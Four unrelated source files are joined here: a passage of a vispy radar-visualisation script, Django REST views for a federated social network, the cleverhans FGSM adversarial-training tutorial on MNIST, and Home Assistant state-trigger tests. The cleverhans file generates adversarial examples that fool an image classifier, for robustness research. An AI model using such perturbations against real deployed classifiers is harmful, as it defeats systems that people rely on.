self.radar_fields.append(radar_fields[num])
except:
self.radar_fields.append('reflectivity')
# Generate dummy data to initialize the Mesh instance
x, y, z, d = radar_example_data()
# print x.shape, y.shape, z.shape
# print d.shape, d.min(), d.max()
mesh = self._init_mesh(x, y, z, d)
mesh_88d = self._init_mesh(x, y, z, d)
# Use colormapping class from matplotlib
self.DZcm = ScalarMappable(norm=Normalize(-25,80), cmap='gist_ncar')
self.VRcm = ScalarMappable(norm=Normalize(-32,32), cmap='PuOr_r')
self.SWcm = ScalarMappable(norm=Normalize(0.0,5.0), cmap='cubehelix_r')
self.radar_mesh = mesh
self.mesh_88d = mesh_88d
self.meshes = (mesh, mesh_88d)
self.rot_view = None
vispy.scene.SceneCanvas.__init__(self, keys='interactive',
title=name, size=size, show=True)
view = self.central_widget.add_view()
view.camera = 'turntable'
view.camera.mode = 'ortho'
view.camera.up = 'z'
view.camera.distance = 20
self.rot_view = view
for a_mesh in self.meshes:
self.rot_view.add(a_mesh)
self.unfreeze() # allow addition of new attributes to the canvas
self.t1 = Text('Time', parent=self.scene, color='white')
self.t1.font_size = 18
self.t1.pos = self.size[0] // 2, self.size[1] // 10
self.loop_reset()
self.timer = vispy.app.Timer(connect=self.loop_radar)
self.timer.start(timer_interval)
def _init_mesh(self, x,y,z,d):
verts, faces = mesh_from_quads(x,y,z)
face_colors = np.empty((faces.shape[0], 4))
face_colors[0::2,0] = d.flat
face_colors[0::2,1] = d.flat
face_colors[0::2,2] = d.flat
face_colors[1::2,0] = d.flat
face_colors[1::2,1] = d.flat
face_colors[1::2,2] = d.flat
face_colors[:,3] = 1.0 # transparency
mdata = MeshData(vertices=verts, faces=faces, face_colors=face_colors)
mesh = Mesh(meshdata=mdata)
# mesh.transform = ChainTransform([STTransform(translate=(0, 0, 0),
# scale=(1.0e-3, 1.0e-3, 1.0e-3) )])
mesh.transform = vispy.scene.transforms.MatrixTransform()
mesh.transform.scale([1./1000, 1./1000, 1./1000])
# mesh.transform.shift([-.2, -.2, -.2])
return mesh
def loop_reset(self):
if self.t_start is not None:
self.loop_start = self.t_start
else:
self.loop_start = np.datetime64(np.min(self.rfc[0].times.values()), 'ns')
if self.t_end is not None:
self.loop_end = self.t_end
else:
self.loop_end = np.datetime64(np.max(self.rfc[0].times.values()), 'ns')
self.loop_current = self.loop_start
def loop_radar(self, event):
current = self.loop_current
last = current
print(current)
self.loop_current = current + self.loop_dt
# ----- Do Ka data -----
# ka_field = 'spectrum_width'
# # ka_field = 'reflectivity'
# r,az,el,t,data = self.rfc.sweep_data_for_time_range(current,
# current+self.loop_duration,
# fieldnames=(ka_field,))
# if r is not None:
# if np.abs(az.mean() - 315.0) > 10:
# az += 90.0
# d = data[ka_field][1:-1, 1:-150]
#
# # print "Found Ka", r.shape, az.shape, el.shape, d.shape
# # print r.min(), r.max(), el.min(), el.max(), az.min(), az.max(), d.min(), d.max()
# verts, faces, face_colors = self._make_plot(r[1:-150], az[1:-1], el[1:-1],
# # d, vmin=-32.0, vmax=25.0, cm=self.DZcm,
# d, vmin=-1.0, vmax=5.0, cm=self.SWcm,
# dx=-dx_ka, dy=-dy_ka)
#
# # print('vert range', verts.min(), verts.max())
#
# self.radar_mesh.set_data(vertices=verts, faces=faces, face_colors=face_colors)
# ----- Do 88D data -----
for ii in range(self.rnum):
r, az, el, t, data = self.rfc[ii].sweep_data_for_time_range(current,
current+self.loop_duration,
fieldnames=(self.radar_fields[0],))
if r is not None:
if (el.mean() < 2.0):
d = data[self.radar_fields[ii]][1:-1, 1:300]
# print "Found 88D", r.shape, az.shape, el.shape, d.shape
# print r.min(), r.max(), el.min(), el.max(), az.min(), az.max(), d.min(), d.max()
verts, faces, face_colors = self._make_plot(
r[1:300], az[1:-1], el[1:-1],
d, vmin=-25.0, vmax=80.0, cm=self.DZcm)
# d, vmin=0.0, vmax=0.4, cm=self.SWcm)
# d, vmin=-32.0, vmax=32.0, cm=self.VRcm)
self.mesh_88d.set_data(vertices=verts, faces=faces, face_colors=face_colors)
face_colors[:,3] = 0.5
# ----- Update plot -----
self.t1.text='{0} UTC'.format(current)
# for m in self.meshes:
# m._program._need_build = True
self.update()
if last>self.loop_end:
self.loop_reset()
def _make_plot(self, r, az, el, d, vmin=-32, vmax=70, dx=0.0, dy=0.0, cm=None):
""" Data are normalized using the min of the data array
after replacing missing values with vmin, so vmin should be less
than the minimum data value
"""
x, y, z = antenna_vectors_to_cartesian(r, az, el, edges=True)
x += dx
y += dy
# print(x.shape, y.shape, z.shape, d.shape)
verts, faces = mesh_from_quads(x, y, z)
squashed = d.filled(vmin).flatten()
face_colors = np.empty((faces.shape[0], 4))
if cm is None:
squashed -= squashed.min()
squashed /= (vmax-vmin) # squashed.max()
# print squashed.min(), squashed.max()
# print(face_colors[0::2,0].shape, squashed.shape)
face_colors[0::2, 0] = squashed # d.flat
face_colors[0::2, 1] = squashed # d.flat
face_colors[0::2, 2] = squashed # d.flat
face_colors[1::2, 0] = squashed # d.flat
face_colors[1::2, 1] = squashed # d.flat
face_colors[1::2, 2] = squashed # d.flat
face_colors[:, 3] = 1.0 # transparency
else:
colors = cm.to_rgba(squashed)
face_colors[0::2] = colors
face_colors[1::2] = colors
return verts, faces, face_colors
def on_draw(self, ev):
gloo.set_clear_color('black')
gloo.clear(color=True, depth=True, stencil=True)
if self.rot_view is not None:
self.draw_visual(self.rot_view)
self.draw_visual(self.t1)
# for mesh in self.meshes:
# print mesh
# self.draw_visual(mesh)
if __name__ == '__main__':
#-------------------
# Selection of interesting times
#-------------------
# filenames = glob.glob('/data/20140607/Ka2/Ka2140608031*')#[5:10]
# filenames_88d = glob.glob('/data/20140607/88D/KLBB20140608_031*')
# t_start = np.datetime64('2014-06-08T03:16:29Z', 'ns')
# filenames = glob.glob('/data/20140607/Ka2/Ka2140608033*')#[5:10]
# filenames_88d = glob.glob('/data/20140607/88D/KLBB20140608_033*')
# t_start = np.datetime64('2014-06-08T03:39:05Z', 'ns')
# t_end = t_start
# timer_interval = 10.0
#-------------------
#
#
# filenames = glob.glob('/data/20140607/Ka2/Ka2140608034*')#[5:10]
# filenames_88d = glob.glob('/data/20140607/88D/KLBB20140608_034*')
# t_start = np.datetime64('2014-06-08T03:40:00Z', 'ns')
# t_end = np.datetime64('2014-06-08T03:50:00Z', 'ns')
#-------------------
filenames = glob.glob('/Users/guy/data/test/brawl_vispy/Ka2/Ka2140608031*')#[5:10]
filenames_88d = glob.glob('/Users/guy/data/test/brawl_vispy/88D/KLBB20140608_031*')
## t_start = datetime.datetime(2014,6,8,3,10,0)
## t_end = datetime.datetime(2014,6,8,3,20,0)
t_start = np.datetime64('2014-06-08T03:10:00Z', 'ns')
t_end = np.datetime64('2014-06-08T03:20:00Z', 'ns')
# dloop, dimage = 10, 10
canvas = Canvas(
radar_filenames=[filenames_88d],
radar_latlons=[(33.654140472412109, -101.81416320800781),
(33.73732, -101.84326)],
time_start=t_start, time_end=t_end,
## loop_step=dloop, image_duration=dimage
)
vispy.app.run()
# canvas.radar_mesh.set_data(self, vertices=None, faces=None, vertex_colors=None, face_colors=None, meshdata=None, color=None)
|
|
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import mixins,generics, status, permissions
from .serializers import AuthorSerializer,PostSerializer,CommentSerializer,PostPagination,CommentPagination,AddCommentQuerySerializer
from rest_framework.decorators import api_view
from .permissions import IsAuthenticatedNodeOrAdmin
from collections import OrderedDict
from .settings import MAXIMUM_PAGE_SIZE,HOST_NAME,PROJECT_ROOT
from .models import Author,Post, friend_request, Comment,Notify,Friend,PostImages,Node
from django.core.urlresolvers import reverse
from django.shortcuts import get_object_or_404,get_list_or_404
import uuid,json, requests
from django.http import Http404
from rest_framework.renderers import JSONRenderer
from .comment_functions import getNodeAuth,getNodeAPIPrefix,friend_relation_validation,author_id_parse
import base64
# ============================================= #
# ============= Posts API (START) ============= #
# ============================================= #
def handle_posts(posts,request):
size = int(request.GET.get('size', MAXIMUM_PAGE_SIZE))
#======
#littleAuthor = Author.objects.get(user=request.user)
try:
littleNode = Node.objects.get(user=request.user)
except Node.DoesNotExist:
littleNode = None
#======
paginator = PostPagination()
images = []
paginator.page_size = size
result_posts = paginator.paginate_queryset(posts, request)
for post in result_posts:
comments = Comment.objects.filter(post=post).order_by('-published')[:5]
for c in comments.all() :
c.author.id = c.author.url
post['comments'] = comments
post['count'] = comments.count()
post['size'] = MAXIMUM_PAGE_SIZE
post['next'] = post.origin + 'comments/'
post['categories'] = json.loads(post.categories)
post['visibleTo'] = json.loads(post.visibleTo)
post['author'].id = post['author'].url
if littleNode != None:
if littleNode.shareImage == False :
if post['contentType'] == 'text/markdown':
post['content'] = post['content'].split('![]')[0]
#============= image
# if post['contentType'] == 'image/png;base64' or post['contentType'] == 'image/jpeg;base64':
# path = PostImages.objects.filter(post=Post.objects.get(id=post['id']))[0].post_image.url
# #post['content'] = base64.b64encode(pimage)
# path = PROJECT_ROOT + path
# fp=open(path,'r+')
# if post['contentType'] == 'image/png;base64':
# post['content'] = "data:image/png;base64, " + base64.b64encode(fp.read())
# if post['contentType'] == 'image/jpeg;base64':
# post['content'] = "data:image/jpeg;base64, " + base64.b64encode(fp.read())
# fh = open("imageToSave.jpeg", "wb")
# fh.write(base64.b64decode(post['content']))
# fh.close()
#============= image
serializer = PostSerializer(result_posts, many=True)
#============= image
#============= image
return paginator.get_paginated_response(serializer.data, size)
class Public_Post_List(APIView):
"""
List all pulic posts
"""
queryset = Post.objects.filter(visibility='PUBLIC').filter(temp=False)
def get(self,request,format=None):
return handle_posts(self.queryset,request)
class Post_Detail(APIView):
"""
List one post with given post id
"""
queryset = Post.objects.all()
def failResponse(self, err_message, status_code):
# generate fail response
response = OrderedDict()
response["query"] = "getPost"
response["success"] = False
response["message"] = err_message
return Response(response, status=status_code)
# return Response(JSONRenderer().render(response), status=status_code)
def get(self,request,post_id,format=None):
posts = get_list_or_404(Post.objects.filter(temp=False),pk=post_id)
return handle_posts(posts,request)
def post(self, request, post_id, format=None):
data = request.data
# request data fields checking
try:
temp_field = data["friends"]
except KeyError:
return self.failResponse(
"Friend list not provided.",
status.HTTP_400_BAD_REQUEST
)
# HOST_NAME
# error handling
# if not (data["query"] == "getPost"):
# return Response(status=status.HTTP_400_BAD_REQUEST)
# if not (data["postid"] == post_id):
# return self.failResponse(
# "The post id in body is different then the post id in url",
# status.HTTP_400_BAD_REQUEST
# )
# get the requested post
post = get_object_or_404(Post.objects.filter(temp=False), pk=post_id)
# get possible FOAF
post_author_following_list = Friend.objects.filter(requester=post.author)
possible_middle_friends = post_author_following_list.filter(requestee_id__in=data["friends"])
# request following list from remote server and compare
is_FOAF = False
for middle_friend in possible_middle_friends:
r = requests.get(middle_friend.requestee+'friends')
remote_following_list = r.json()
if post.author.id in remote_following_list:
is_FOAF = True
break
# response
if is_FOAF:
posts = get_list_or_404(Post, pk=post_id)
return handle_posts(posts,request)
else:
return self.failResponse(
"Requester is not FOAF",
status.HTTP_401_UNAUTHORIZED
)
class All_Visible_Post_List_To_User(APIView):
"""
List all posts that visible to an authenticated user.
"""
queryset = Post.objects.exclude(visibility='SERVERONLY').filter(temp=False)
def get(self,request, format=None):
return handle_posts(self.queryset,request)
class All_Visible_Post_List_From_An_Author_To_User(APIView):
"""
List all posts from an author that visible to an authenticated user.
"""
queryset = Post.objects.exclude(visibility='SERVERONLY').filter(temp=False)
def get(self,request, author_id, format=None):
author = get_object_or_404(Author.filter(temp=False),pk=author_id)
posts=self.queryset.filter(author = author_id)
return handle_posts(posts,request)
# ============== Posts API (END) ============== #
# ============================================= #
# =========== Comments API (START) ============ #
# ============================================= #
class Comment_list(APIView):
"""
List all comments, or create a new comment.
"""
queryset = Comment.objects.all()
def get(self,request,post_id,format=None):
post = get_object_or_404(Post.objects.filter(temp=False),pk=post_id)
size = int(request.GET.get('size', 5))
paginator = CommentPagination()
paginator.page_size = size
Comments = Comment.objects.filter(post=post_id)
result_comments = paginator.paginate_queryset(Comments, request)
for c in result_comments:
#post['author'].id = post['author'].url
c.author.id = c.author.url
serializer = CommentSerializer(result_comments, many=True)
return paginator.get_paginated_response(serializer.data, size)
def post(self,request,post_id,format=None):
response = OrderedDict()
response['query'] = 'addComment'
data = request.data
serializer = AddCommentQuerySerializer(data=data)
if serializer.is_valid():
serializer.save()
response['success'] = True
response['message'] = 'Comment Added'
code = status.HTTP_200_OK
else:
response['success'] = False
response['message'] = serializer.errors
code = status.HTTP_400_BAD_REQUEST
return Response(response,status=code)
# ============ Comments API (END) ============= #
# ============================================= #
# ============ Profile API (START) ============ #
# ============================================= #
class AuthorView(APIView):
queryset = Author.objects.all()
def get(self, request, author_id, format=None):
author1 = get_object_or_404(Author,pk=author_id)
serializer = AuthorSerializer(author1)
author = serializer.data
author['id'] = author['url']
author['friends'] = []
followlist = author1.follow.all()
for i in followlist :
serializer = AuthorSerializer(Author.objects.get(id=author_id_parse(i.requestee_id)))
j = serializer.data
j['id'] = j['url']
author['friends'].append(j)
return Response(author)
# ============= Profile API (END) ============= #
# ============================================= #
# ============ Friend API (START) ============= #
# ============================================= #
#@api_view(['POST'])
#def handle_friendrequest(request,format=None):
# queryset = Notify.objects.all()
# if (request.method == 'POST'):
# data = request.data
# if not (data[query] == "friendrequest"):
# return Response(status=status.HTTP_400_BAD_REQUEST)
# try:
# friend = Author.objects.get(data[friend][id])
# except Author.DoesNotExist:
# return Response(status=status.HTTP_400_BAD_REQUEST)
# new_notify = Notify.objects.create(friend,data[author][url])
# new_notify.save()
class Friend_Inquiry_Handler(APIView):
"""
return all friends with a given author.
"""
queryset = Friend.objects.all()
def successResponse(self, author_id, friend_list):
# generate success response
response = OrderedDict()
response["query"] = "friends"
response["author"] = author_id
response["authors"] = friend_list
return Response(response, status=status.HTTP_200_OK)
def failResponse(self, err_message, status_code):
# generate fail response
response = OrderedDict()
response["query"] = "friends"
response["success"] = False,
response["message"] = err_message
return Response(response, status=status_code)
def get(self, request, author_id, format=None):
# pull all the following author by author_id
friends = Friend.objects.filter(requester=author_id)
# store author ids in a list
result = []
for friend in friends:
# if friend.requestee_host == HOST_NAME:
# friend.requestee_host = friend.requestee_host + '/service/'
# if friend.requestee_host[-1] != '/':
# friend.requestee_host = friend.requestee_host + '/'
# print(friend.requestee_id)
# result.append(friend.requestee_host + 'author/' + friend.requestee_id)
result.append(friend.requestee)
# return success response
return self.successResponse(HOST_NAME + '/service/author/' + author_id, result)
def post(self,request, author_id, format=None):
data = request.data
# error handling TODOXXX
if not (data["query"] == "friends"):
return Response(status=status.HTTP_400_BAD_REQUEST)
if not (data["author"] == author_id):
return self.failResponse(
"The author id in body is different then the author id in url",
status.HTTP_400_BAD_REQUEST)
# proceeds matching
inquiry_friend_list = data["authors"]
result = []
for friend_id in inquiry_friend_list:
try:
queryset = Friend.objects.filter(requester=author_id)
queryset.get(requestee_id=friend_id)
except Friend.DoesNotExist:
continue
else:
result.append(friend_id)
# return success response
return self.successResponse(data["author"], result)
class Accurate_Friend_Inquiry_Handler(APIView):
"""
handle friend inquiry between two authors.
"""
queryset = Friend.objects.all()
def get(self, request, author_id1, author_id2, format=None):
# prepare response
response = OrderedDict()
response["query"] = "friends"
response["authors"] = [author_id1, author_id2]
response["friends"] = True
# pull author info
try:
author1 = Author.objects.get(id=author_id1)
except Author.DoesNotExist:
response["friends"] = False
try:
author2 = Author.objects.get(id=author_id2)
except Author.DoesNotExist:
response["friends"] = False
friend_validation_result = friend_relation_validation(author1.url, author1.host, author2.url, author2.host)
if friend_validation_result["success"]:
response["friends"] = friend_validation_result["friend_status"]
# print "==================="
# print(response["friends"])
else:
response["friends"] = False
print friend_validation_result["messages"]
"""
# pull all the following author by author_id
following_1 = Friend.objects.filter(requester=author_id1)
following_2 = Friend.objects.filter(requester=author_id2)
# two way matches tests, true friend will need to pass both tests
try:
following_1.get(requestee_id=author_id2)
except Friend.DoesNotExist:
response["friends"] = False
try:
following_2.get(requestee_id=author_id1)
except Friend.DoesNotExist:
response["friends"] = False
"""
# return response
return Response(response, status=status.HTTP_200_OK)
class Friendrequest_Handler(APIView):
"""
Handle all friend requests
"""
queryset = Notify.objects.all()
def post(self,request,format=None):
# data = json.loads(request.data)
data = request.data
# print(data)
if not (data["query"] == "friendrequest"):
return Response(status=status.HTTP_400_BAD_REQUEST)
try:
data["friend"]["id"] = author_id_parse(data["friend"]["id"])
data["author"]["id"] = author_id_parse(data["author"]["id"])
friend = Author.objects.get(id=data["friend"]["id"])
# redundent Notify check
varify_result = Notify.objects.all()
varify_result = varify_result.filter(requester=data["author"]["url"])
varify_result = varify_result.filter(requester_id = author_id_parse(data["author"]["id"]))
varify_result = varify_result.filter(requestee=friend)
# check if requestee have followed requester
f_varify_result = Friend.objects.all()
f_varify_result = f_varify_result.filter(requestee=data["author"]["url"])
f_varify_result = f_varify_result.filter(requestee_id=author_id_parse(data["author"]["id"]))
f_varify_result = f_varify_result.filter(requester=friend)
if(len(varify_result)<1 and len(f_varify_result)<1):
new_notify = Notify.objects.create(requestee=friend,
requester=data["author"]["url"],
requester_displayName=data["author"]["displayName"],
requester_host = data["author"]["host"],
requester_id = author_id_parse(data["author"]["id"]))
new_notify.save()
except Author.DoesNotExist:
raise Http404
else:
response = OrderedDict()
response["query"] = "friendrequest"
response["success"] = True
response["message"] = "Friend request sent"
return Response(response, status=status.HTTP_200_OK)
# ============= Friend API (END) ============== #
|
|
"""
This tutorial shows how to generate adversarial examples using FGSM
and train a model using adversarial training with TensorFlow.
It is very similar to mnist_tutorial_keras_tf.py, which does the same
thing but with a dependence on keras.
The original paper can be found at:
https://arxiv.org/abs/1412.6572
"""
# pylint: disable=missing-docstring
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import numpy as np
import tensorflow as tf
from cleverhans.compat import flags
from cleverhans.loss import CrossEntropy
from cleverhans.dataset import MNIST
from cleverhans.utils_tf import model_eval
from cleverhans.train import train
from cleverhans.attacks import FastGradientMethod
from cleverhans.utils import AccuracyReport, set_log_level
from cleverhans.model_zoo.basic_cnn import ModelBasicCNN
FLAGS = flags.FLAGS
NB_EPOCHS = 6
BATCH_SIZE = 128
LEARNING_RATE = 0.001
CLEAN_TRAIN = True
BACKPROP_THROUGH_ATTACK = False
NB_FILTERS = 64
def mnist_tutorial(
train_start=0,
train_end=60000,
test_start=0,
test_end=10000,
nb_epochs=NB_EPOCHS,
batch_size=BATCH_SIZE,
learning_rate=LEARNING_RATE,
clean_train=CLEAN_TRAIN,
testing=False,
backprop_through_attack=BACKPROP_THROUGH_ATTACK,
nb_filters=NB_FILTERS,
num_threads=None,
label_smoothing=0.1,
):
"""
MNIST cleverhans tutorial
:param train_start: index of first training set example
:param train_end: index of last training set example
:param test_start: index of first test set example
:param test_end: index of last test set example
:param nb_epochs: number of epochs to train model
:param batch_size: size of training batches
:param learning_rate: learning rate for training
:param clean_train: perform normal training on clean examples only
before performing adversarial training.
:param testing: if true, complete an AccuracyReport for unit tests
to verify that performance is adequate
:param backprop_through_attack: If True, backprop through adversarial
example construction process during
adversarial training.
:param label_smoothing: float, amount of label smoothing for cross entropy
:return: an AccuracyReport object
"""
# Object used to keep track of (and return) key accuracies
report = AccuracyReport()
# Set TF random seed to improve reproducibility
tf.set_random_seed(1234)
# Set logging level to see debug information
set_log_level(logging.DEBUG)
# Create TF session
if num_threads:
config_args = dict(intra_op_parallelism_threads=1)
else:
config_args = {}
sess = tf.Session(config=tf.ConfigProto(**config_args))
# Get MNIST data
mnist = MNIST(
train_start=train_start,
train_end=train_end,
test_start=test_start,
test_end=test_end,
)
x_train, y_train = mnist.get_set("train")
x_test, y_test = mnist.get_set("test")
# Use Image Parameters
img_rows, img_cols, nchannels = x_train.shape[1:4]
nb_classes = y_train.shape[1]
# Define input TF placeholder
x = tf.placeholder(tf.float32, shape=(None, img_rows, img_cols, nchannels))
y = tf.placeholder(tf.float32, shape=(None, nb_classes))
# Train an MNIST model
train_params = {
"nb_epochs": nb_epochs,
"batch_size": batch_size,
"learning_rate": learning_rate,
}
eval_params = {"batch_size": batch_size}
fgsm_params = {"eps": 0.3, "clip_min": 0.0, "clip_max": 1.0}
rng = np.random.RandomState([2017, 8, 30])
def do_eval(preds, x_set, y_set, report_key, is_adv=None):
acc = model_eval(sess, x, y, preds, x_set, y_set, args=eval_params)
setattr(report, report_key, acc)
if is_adv is None:
report_text = None
elif is_adv:
report_text = "adversarial"
else:
report_text = "legitimate"
if report_text:
print("Test accuracy on %s examples: %0.4f" % (report_text, acc))
if clean_train:
model = ModelBasicCNN("model1", nb_classes, nb_filters)
preds = model.get_logits(x)
loss = CrossEntropy(model, smoothing=label_smoothing)
def evaluate():
do_eval(preds, x_test, y_test, "clean_train_clean_eval", False)
train(
sess,
loss,
x_train,
y_train,
evaluate=evaluate,
args=train_params,
rng=rng,
var_list=model.get_params(),
)
# Calculate training error
if testing:
do_eval(preds, x_train, y_train, "train_clean_train_clean_eval")
# Initialize the Fast Gradient Sign Method (FGSM) attack object and
# graph
fgsm = FastGradientMethod(model, sess=sess)
adv_x = fgsm.generate(x, **fgsm_params)
preds_adv = model.get_logits(adv_x)
# Evaluate the accuracy of the MNIST model on adversarial examples
do_eval(preds_adv, x_test, y_test, "clean_train_adv_eval", True)
# Calculate training error
if testing:
do_eval(preds_adv, x_train, y_train, "train_clean_train_adv_eval")
print("Repeating the process, using adversarial training")
# Create a new model and train it to be robust to FastGradientMethod
model2 = ModelBasicCNN("model2", nb_classes, nb_filters)
fgsm2 = FastGradientMethod(model2, sess=sess)
def attack(x):
return fgsm2.generate(x, **fgsm_params)
loss2 = CrossEntropy(model2, smoothing=label_smoothing, attack=attack)
preds2 = model2.get_logits(x)
adv_x2 = attack(x)
if not backprop_through_attack:
# For the fgsm attack used in this tutorial, the attack has zero
# gradient so enabling this flag does not change the gradient.
# For some other attacks, enabling this flag increases the cost of
# training, but gives the defender the ability to anticipate how
# the atacker will change their strategy in response to updates to
# the defender's parameters.
adv_x2 = tf.stop_gradient(adv_x2)
preds2_adv = model2.get_logits(adv_x2)
def evaluate2():
# Accuracy of adversarially trained model on legitimate test inputs
do_eval(preds2, x_test, y_test, "adv_train_clean_eval", False)
# Accuracy of the adversarially trained model on adversarial examples
do_eval(preds2_adv, x_test, y_test, "adv_train_adv_eval", True)
# Perform and evaluate adversarial training
train(
sess,
loss2,
x_train,
y_train,
evaluate=evaluate2,
args=train_params,
rng=rng,
var_list=model2.get_params(),
)
# Calculate training errors
if testing:
do_eval(preds2, x_train, y_train, "train_adv_train_clean_eval")
do_eval(preds2_adv, x_train, y_train, "train_adv_train_adv_eval")
return report
def main(argv=None):
"""
Run the tutorial using command line flags.
"""
from cleverhans_tutorials import check_installation
check_installation(__file__)
mnist_tutorial(
nb_epochs=FLAGS.nb_epochs,
batch_size=FLAGS.batch_size,
learning_rate=FLAGS.learning_rate,
clean_train=FLAGS.clean_train,
backprop_through_attack=FLAGS.backprop_through_attack,
nb_filters=FLAGS.nb_filters,
)
if __name__ == "__main__":
flags.DEFINE_integer("nb_filters", NB_FILTERS, "Model size multiplier")
flags.DEFINE_integer("nb_epochs", NB_EPOCHS, "Number of epochs to train model")
flags.DEFINE_integer("batch_size", BATCH_SIZE, "Size of training batches")
flags.DEFINE_float("learning_rate", LEARNING_RATE, "Learning rate for training")
flags.DEFINE_bool("clean_train", CLEAN_TRAIN, "Train on clean examples")
flags.DEFINE_bool(
"backprop_through_attack",
BACKPROP_THROUGH_ATTACK,
(
"If True, backprop through adversarial example "
"construction process during adversarial training"
),
)
tf.app.run()
|
|
"""The test for state automation."""
from datetime import timedelta
from unittest.mock import patch
import pytest
import homeassistant.components.automation as automation
from homeassistant.components.homeassistant.triggers import state as state_trigger
from homeassistant.const import ATTR_ENTITY_ID, ENTITY_MATCH_ALL, SERVICE_TURN_OFF
from homeassistant.core import Context
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.common import (
assert_setup_component,
async_fire_time_changed,
async_mock_service,
mock_component,
)
@pytest.fixture
def calls(hass):
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
@pytest.fixture(autouse=True)
def setup_comp(hass):
"""Initialize components."""
mock_component(hass, "group")
hass.states.async_set("test.entity", "hello")
async def test_if_fires_on_entity_change(hass, calls):
"""Test for firing on entity change."""
context = Context()
hass.states.async_set("test.entity", "hello")
await hass.async_block_till_done()
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "state", "entity_id": "test.entity"},
"action": {
"service": "test.automation",
"data_template": {
"some": "{{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
"for",
)
)
},
},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world", context=context)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context.parent_id == context.id
assert calls[0].data["some"] == "state - test.entity - hello - world - None"
await hass.services.async_call(
automation.DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: ENTITY_MATCH_ALL},
blocking=True,
)
hass.states.async_set("test.entity", "planet")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_from_filter(hass, calls):
"""Test for firing on entity change with filter."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_to_filter(hass, calls):
"""Test for firing on entity change with no filter."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_attribute_change_with_to_filter(hass, calls):
"""Test for not firing on attribute change."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world", {"test_attribute": 11})
hass.states.async_set("test.entity", "world", {"test_attribute": 12})
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_both_filters(hass, calls):
"""Test for firing if both filters are a non match."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_not_fires_if_to_filter_not_match(hass, calls):
"""Test for not firing if to filter is not a match."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "moon")
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_not_fires_if_from_filter_not_match(hass, calls):
"""Test for not firing if from filter is not a match."""
hass.states.async_set("test.entity", "bye")
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_not_fires_if_entity_not_match(hass, calls):
"""Test for not firing if entity is not matching."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "state", "entity_id": "test.another_entity"},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async def test_if_action(hass, calls):
"""Test for to action."""
entity_id = "domain.test_entity"
test_state = "new_state"
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": [
{"condition": "state", "entity_id": entity_id, "state": test_state}
],
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set(entity_id, test_state)
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
hass.states.async_set(entity_id, test_state + "something")
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fails_setup_if_to_boolean_value(hass, calls):
"""Test for setup failure for boolean to."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": True,
},
"action": {"service": "homeassistant.turn_on"},
}
},
)
async def test_if_fails_setup_if_from_boolean_value(hass, calls):
"""Test for setup failure for boolean from."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": True,
},
"action": {"service": "homeassistant.turn_on"},
}
},
)
async def test_if_fails_setup_bad_for(hass, calls):
"""Test for setup failure for bad for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"invalid": 5},
},
"action": {"service": "homeassistant.turn_on"},
}
},
)
